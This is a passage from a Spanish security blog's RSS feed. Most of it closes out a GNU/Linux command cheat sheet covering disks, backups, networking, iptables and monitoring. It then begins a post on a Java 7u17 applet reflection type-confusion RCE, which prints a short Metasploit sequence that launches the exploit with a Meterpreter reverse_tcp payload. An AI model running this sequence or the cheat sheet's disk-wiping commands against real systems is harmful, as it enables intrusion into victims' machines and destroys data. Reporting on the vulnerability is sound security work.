&lt;b&gt;fsck.msdos /dev/hda1&lt;/b&gt;: reparar / chequear la integridad de un fichero del sistema dos en el disco hda1.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dosfsck /dev/hda1&lt;/b&gt;: reparar / chequear la integridad de un fichero del sistema dos en el disco hda1.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="format"&gt;&lt;/a&gt;Formatear un sistema de ficheros&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mkfs /dev/hda1&lt;/b&gt;: crear un fichero de sistema tipo Linux en la partición hda1.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mke2fs /dev/hda1&lt;/b&gt;: crear un fichero de sistema tipo Linux ext 2 en hda1.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mke2fs -j /dev/hda1&lt;/b&gt;: crear un fichero de sistema tipo Linux ext3 (periódico) en la partición hda1.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mkfs -t vfat 32 -F /dev/hda1&lt;/b&gt;: crear un fichero de sistema FAT32 en hda1.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;fdformat -n /dev/fd0&lt;/b&gt;: formatear un disco flooply.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mkswap /dev/hda3&lt;/b&gt;: crear un fichero de sistema swap.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="swap"&gt;&lt;/a&gt;Trabajo con la SWAP&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mkswap /dev/hda3&lt;/b&gt;: crear fichero de sistema swap.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;swapon /dev/hda3&lt;/b&gt;: activando una nueva partición swap.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;swapon /dev/hda2 /dev/hdb3&lt;/b&gt;: activar dos particiones swap.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="backup"&gt;&lt;/a&gt;Salvas (Backup)&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dump -0aj -f /tmp/home0.bak /home&lt;/b&gt;: hacer una salva completa del directorio ‘/home’.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dump -1aj -f /tmp/home0.bak /home&lt;/b&gt;: hacer una salva incremental del directorio ‘/home’.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;restore -if /tmp/home0.bak&lt;/b&gt;: restaurando una salva interactivamente.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rsync -rogpav –delete /home /tmp&lt;/b&gt;: sincronización entre directorios.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rsync -rogpav -e ssh –delete /home ip_address:/tmp&lt;/b&gt;: rsync a través del túnel &lt;acronym title="Secure Shell"&gt;SSH&lt;/acronym&gt;.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rsync -az -e ssh –delete ip_addr:/home/public /home/local&lt;/b&gt;: sincronizar un directorio local con un directorio remoto a través de ssh y de compresión.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rsync -az -e ssh –delete /home/local ip_addr:/home/public&lt;/b&gt;: sincronizar un directorio remoto con un directorio local a través de ssh y de compresión.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dd bs=1M if=/dev/hda | gzip | ssh user@ip_addr ‘dd of=hda.gz’&lt;/b&gt;: hacer una salva de un disco duro en un host remoto a través de ssh.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dd if=/dev/sda of=/tmp/file1&lt;/b&gt;: salvar el contenido de un disco duro a un fichero. (En este caso el disco duro es “sda” y el fichero “file1”).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tar -Puf backup.tar /home/user&lt;/b&gt;: hacer una salva incremental del directorio ‘/home/user’.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;( cd /tmp/local/ &amp;amp;&amp;amp; tar c . ) | ssh -C user@ip_addr ‘cd /home/share/ &amp;amp;&amp;amp; tar x -p’&lt;/b&gt;: copiar el contenido de un directorio en un directorio remoto a través de ssh.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;( tar c /home ) | ssh -C user@ip_addr ‘cd /home/backup-home &amp;amp;&amp;amp; tar x -p’&lt;/b&gt;: copiar un directorio local en un directorio remoto a través de ssh.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tar cf – . | (cd /tmp/backup ; tar xf – )&lt;/b&gt;: copia local conservando las licencias y enlaces desde un directorio a otro.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;find /home/user1 -name ‘*.txt’ | xargs cp -av –target-directory=/home/backup/ –parents&lt;/b&gt;: encontrar y copiar todos los ficheros con extensión ‘.txt’ de un directorio a otro.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;find /var/log -name ‘*.log’ | tar cv –files-from=- | bzip2 &amp;gt; log.tar.bz2&lt;/b&gt;: encontrar todos los ficheros con extensión ‘.log’ y hacer un archivo bzip.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dd if=/dev/hda of=/dev/fd0 bs=512 count=1&lt;/b&gt;: hacer una copia del MRB (Master Boot Record) a un disco floppy.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dd if=/dev/fd0 of=/dev/hda bs=512 count=1&lt;/b&gt;: restaurar la copia del MBR (Master Boot Record) salvada en un floppy.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="cdrom"&gt;&lt;/a&gt;CD-ROM&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cdrecord -v gracetime=2 dev=/dev/cdrom -eject blank=fast -force&lt;/b&gt;: limpiar o borrar un cd regrabable.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mkisofs /dev/cdrom &amp;gt; cd.iso&lt;/b&gt;: crear una imagen iso de cdrom en disco.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mkisofs /dev/cdrom | gzip &amp;gt; cd_iso.gz&lt;/b&gt;: crear una imagen comprimida iso de cdrom en disco.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mkisofs -J -allow-leading-dots -R -V “Label CD” -iso-level 4 -o ./cd.iso data_cd&lt;/b&gt;: crear una imagen iso de un directorio.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cdrecord -v dev=/dev/cdrom cd.iso&lt;/b&gt;: quemar una imagen iso.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;gzip -dc cd_iso.gz | cdrecord dev=/dev/cdrom -&lt;/b&gt;: quemar una imagen iso comprimida.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mount -o loop cd.iso /mnt/iso&lt;/b&gt;: montar una imagen iso.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cd-paranoia -B&lt;/b&gt;: llevar canciones de un cd a ficheros wav.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cd-paranoia – ”-3”&lt;/b&gt;: llevar las 3 primeras canciones de un cd a ficheros wav.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cdrecord –scanbus&lt;/b&gt;: escanear bus para identificar el canal scsi.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dd if=/dev/hdc | md5sum&lt;/b&gt;: hacer funcionar un md5sum en un dispositivo, como un CD.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="red"&gt;&lt;/a&gt;Trabajo con la RED ( &lt;acronym title="Local Area Network"&gt;LAN&lt;/acronym&gt; y Wi-Fi)&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ifconfig eth0&lt;/b&gt;: mostrar la configuración de una tarjeta de red Ethernet.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ifup eth0&lt;/b&gt;: activar una interface ‘eth0?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ifdown eth0&lt;/b&gt;: deshabilitar una interface ‘eth0?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ifconfig eth0 192.168.1.1 netmask 255.255.255.0&lt;/b&gt;: configurar una dirección IP.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ifconfig eth0 promisc&lt;/b&gt;: configurar ‘eth0?en modo común para obtener los paquetes (sniffing).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dhclient eth0&lt;/b&gt;: activar la interface ‘eth0? en modo dhcp.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;route -n&lt;/b&gt;: mostrar mesa de recorrido.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;route add -net 0/0 gw IP_Gateway&lt;/b&gt;: configurar entrada predeterminada.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;route add -net 192.168.0.0 netmask 255.255.0.0 gw 192.168.1.1&lt;/b&gt;: configurar ruta estática para buscar la red ’192.168.0.0/16?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;route del 0/0 gw IP_gateway&lt;/b&gt;: eliminar la ruta estática.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;echo “1” &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;/b&gt;: activar el recorrido ip.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;hostname&lt;/b&gt;: mostrar el nombre del host del sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;host &lt;a href="http://www.example.com/" rel="nofollow" title="http://www.example.com"&gt;www.example.com&lt;/a&gt;&lt;/b&gt;: buscar el nombre del host para resolver el nombre a una dirección ip(1).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;nslookup &lt;a href="http://www.example.com/" rel="nofollow" title="http://www.example.com"&gt;www.example.com&lt;/a&gt;&lt;/b&gt;: buscar el nombre del host para resolver el nombre a una direccióm ip y viceversa(2).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ip link show&lt;/b&gt;: mostar el estado de enlace de todas las interfaces.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mii-tool eth0&lt;/b&gt;: mostar el estado de enlace de ‘eth0?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ethtool eth0&lt;/b&gt;: mostrar las estadísticas de tarjeta de red ‘eth0?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;netstat -tup&lt;/b&gt;: mostrar todas las conexiones de red activas y sus PID.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;netstat -tupl&lt;/b&gt;: mostrar todos los servicios de escucha de red en el sistema y sus PID.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tcpdump tcp port 80&lt;/b&gt;: mostrar todo el tráfico &lt;acronym title="Hyper Text Transfer Protocol"&gt;HTTP&lt;/acronym&gt;.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iwlist scan&lt;/b&gt;: mostrar las redes inalámbricas.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iwconfig eth1&lt;/b&gt;: mostrar la configuración de una tarjeta de red inalámbrica.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;whois &lt;a href="http://www.example.com/" rel="nofollow" title="http://www.example.com"&gt;www.example.com&lt;/a&gt;&lt;/b&gt;: buscar en base de datos Whois.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="samba"&gt;&lt;/a&gt;Redes de Microsoft Windows (SAMBA)&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;nbtscan ip_addr&lt;/b&gt;: resolución de nombre de red bios.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;nmblookup -A ip_addr&lt;/b&gt;: resolución de nombre de red bios.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;smbclient -L ip_addr/hostname&lt;/b&gt;: mostrar acciones remotas de un host en windows.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="iptable"&gt;&lt;/a&gt;Tablas IP (CORTAFUEGOS)&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iptables -t filter -L&lt;/b&gt;: mostrar todas las cadenas de la tabla de filtro.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iptables -t nat -L&lt;/b&gt;: mostrar todas las cadenas de la tabla nat.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iptables -t filter -F&lt;/b&gt;: limpiar todas las reglas de la tabla de filtro.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iptables -t nat -F&lt;/b&gt;: limpiar todas las reglas de la tabla nat.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iptables -t filter -X&lt;/b&gt;: borrar cualquier cadena creada por el usuario.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iptables -t filter -A INPUT -p tcp –dport telnet -j ACCEPT&lt;/b&gt;: permitir las conexiones telnet para entar.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iptables -t filter -A OUTPUT -p tcp –dport http -j DROP&lt;/b&gt;: bloquear las conexiones &lt;acronym title="Hyper Text Transfer Protocol"&gt;HTTP&lt;/acronym&gt; para salir.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iptables -t filter -A FORWARD -p tcp –dport pop3 -j ACCEPT&lt;/b&gt;: permitir las conexiones &lt;acronym title="Post Office Protocol"&gt;POP&lt;/acronym&gt; a una cadena delantera.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iptables -t filter -A INPUT -j LOG –log-prefix “DROP INPUT”&lt;/b&gt;: registrando una cadena de entrada.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE&lt;/b&gt;: configurar un PAT (Puerto de traducción de dirección) en eth0, ocultando los paquetes de salida forzada.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iptables -t nat -A PREROUTING -d 192.168.0.1 -p tcp -m tcp –dport 22 -j DNAT –to-destination 10.0.0.2:22&lt;/b&gt;: redireccionar los paquetes diriguidos de un host a otro.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="monitor"&gt;&lt;/a&gt;Monitoreando y depurando&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;top&lt;/b&gt;: mostrar las tareas de linux usando la mayoría cpu.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ps -eafw&lt;/b&gt;: muestra las tareas Linux.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ps -e -o pid,args –forest&lt;/b&gt;: muestra las tareas Linux en un modo jerárquico.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;pstree&lt;/b&gt;: mostrar un árbol sistema de procesos.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;kill -9 ID_Processo&lt;/b&gt;: forzar el cierre de un proceso y terminarlo.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;kill -1 ID_Processo&lt;/b&gt;: forzar un proceso para recargar la configuración.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;lsof -p $$&lt;/b&gt;: mostrar una lista de ficheros abiertos por procesos.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;lsof /home/user1&lt;/b&gt;: muestra una lista de ficheros abiertos en un camino dado del sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;strace -c ls &amp;gt;/dev/null&lt;/b&gt;: mostrar las llamadas del sistema hechas y recibidas por un proceso.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;strace -f -e open ls &amp;gt;/dev/null&lt;/b&gt;: mostrar las llamadas a la biblioteca.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;watch -n1 ‘cat /proc/interrupts’&lt;/b&gt;: mostrar interrupciones en tiempo real.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;last reboot&lt;/b&gt;: mostrar historial de reinicio.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;lsmod&lt;/b&gt;: mostrar el kernel cargado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;free -m&lt;/b&gt;: muestra el estado de la RAM en megabytes.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;smartctl -A /dev/hda&lt;/b&gt;: monitorear la fiabilidad de un disco duro a través de SMART.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;smartctl -i /dev/hda&lt;/b&gt;: chequear si SMART está activado en un disco duro.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tail /var/log/dmesg&lt;/b&gt;: mostrar eventos inherentes al proceso de carga del kernel.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tail /var/log/messages&lt;/b&gt;: mostrar los eventos del sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="otros"&gt;&lt;/a&gt;Otros comandos útiles&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;apropos …keyword&lt;/b&gt;: mostrar una lista de comandos que pertenecen a las palabras claves de un programa; son útiles cuando tú sabes qué hace tu programa, pero de sconoces el nombre del comando.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;man ping&lt;/b&gt;: mostrar las páginas del manual on-line; por ejemplo, en un comando ping, usar la opción ‘-k’ para encontrar cualquier comando relacionado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;whatis …keyword&lt;/b&gt;: muestra la descripción de lo que hace el programa.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mkbootdisk –device /dev/fd0 `uname -r`&lt;/b&gt;: crear un floppy boteable.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;gpg -c file1&lt;/b&gt;: codificar un fichero con guardia de seguridad GNU.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;gpg file1.gpg&lt;/b&gt;: decodificar un fichero con Guardia de seguridad GNU.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;wget -r &lt;a href="http://www.example.com/" rel="nofollow" title="http://www.example.com"&gt;www.example.com&lt;/a&gt;&lt;/b&gt;: descargar un sitio web completo.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;wget -c &lt;a href="http://www.example.com/file.iso" rel="nofollow" title="http://www.example.com/file.iso"&gt;www.example.com/file.iso&lt;/a&gt;&lt;/b&gt;: descargar un fichero con la posibilidad de parar la descargar y reanudar más tarde.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;echo ‘wget -c &lt;a href="http://www.example.com/files.iso" rel="nofollow" title="http://www.example.com/files.iso"&gt;www.example.com/files.iso&lt;/a&gt;‘ | at 09:00&lt;/b&gt;: Comenzar una descarga a cualquier hora. En este caso empezaría a las 9 horas.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ldd /usr/bin/ssh&lt;/b&gt;: mostrar las bibliotecas compartidas requeridas por el programa ssh.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;alias hh=’history’&lt;/b&gt;: colocar un alias para un commando –hh= Historial.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chsh&lt;/b&gt;: cambiar el comando Shell.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;chsh –list-shells&lt;/b&gt;: es un comando adecuado para saber si tienes que hacer remoto en otra terminal.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;who -a&lt;/b&gt;: mostrar quien está registrado, e imprimir hora del último sistema de importación, procesos muertos, procesos de registro de sistema, procesos activos producidos por init, funcionamiento actual y últimos cambios del reloj del sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;b&gt;Fuente: &lt;/b&gt;&lt;a href="http://gutl.jovenclub.cu/wiki/comandos/inicio" target="_blank"&gt;http://gutl.jovenclub.cu/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/YiiibEDyb9g" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-05-04T18:42:04.679-04:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-EUYxuN5JnJM/UYWMiIj5kMI/AAAAAAAAB_U/U6jV1p1mocg/s72-c/linux.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html</feedburner:origLink></item><item><title>Nuevo Bug en Java 7u17 (Video MSF)  [Applet Reflection Type Confusion RCE]</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/E0H_zDk1JCM/nuevo-bug-en-java-7u17-video-msf-applet.html</link><category>Video</category><category>Java</category><category>Bug</category><category>Seguridad Web</category><category>Metasploit</category><category>Exploit</category><category>Seguridad</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sat, 20 Apr 2013 12:17:13 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-5832671089393508793</guid><description>&lt;a href="http://3.bp.blogspot.com/-_fIoBOrOBRo/UXLorCQckPI/AAAAAAAAB9I/S28HFkb5Cww/s1600/java_hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="338" src="http://3.bp.blogspot.com/-_fIoBOrOBRo/UXLorCQckPI/AAAAAAAAB9I/S28HFkb5Cww/s640/java_hacked.jpg" width="640" /&gt;&lt;/a&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Pareciera ser que Java no ha podido salir del hoyo en el que ha caído después de descubrirse un 0day tras otro, y como si no fuera suficiente nuevamente ha salido a la luz una nueva vulnerabilidad que afecta a &lt;b&gt;Java versiones 7 update 17&lt;/b&gt; y anteriores.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Fue descubierta por &lt;i&gt;&lt;b&gt;Jeroen Frijters&lt;/b&gt;&lt;/i&gt; que la publicó el 17-04-2013, recientemente (el 20-04-2013) Metasploit a proporcionado un módulo que explota dicha vulnerabilidad.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
El módulo abusa del &lt;i&gt;Java Reflection&lt;/i&gt; generando una &lt;i&gt;Type Confusion&lt;/i&gt;, debido a un débil control de acceso al establecer campos finales sobre las clases estáticas, ejecutando así código fuera del Sandbox de Java. Este exploit no bypasea el &lt;i&gt;click-to-play&lt;/i&gt; de Java, por lo cual la víctima debe aceptar la advertencia que dice que se puede ejecutar un Applet malicioso en Java.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Aquí les dejo un video con la explotación con Metasploit:&lt;/div&gt;
&lt;br /&gt;

&lt;div style="clear: both; text-align: center;"&gt;

&lt;iframe width="728" height="410" src="http://www.youtube.com/embed/RVElc3obEcE?rel=0" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;

&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;b&gt;Fuente y Video:&lt;/b&gt; &lt;a href="http://eromang.zataz.com/2013/04/20/java-7u17-applet-reflection-type-confusion-rce-metasploit-demo/" target="_blank"&gt;http://eromang.zataz.com/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
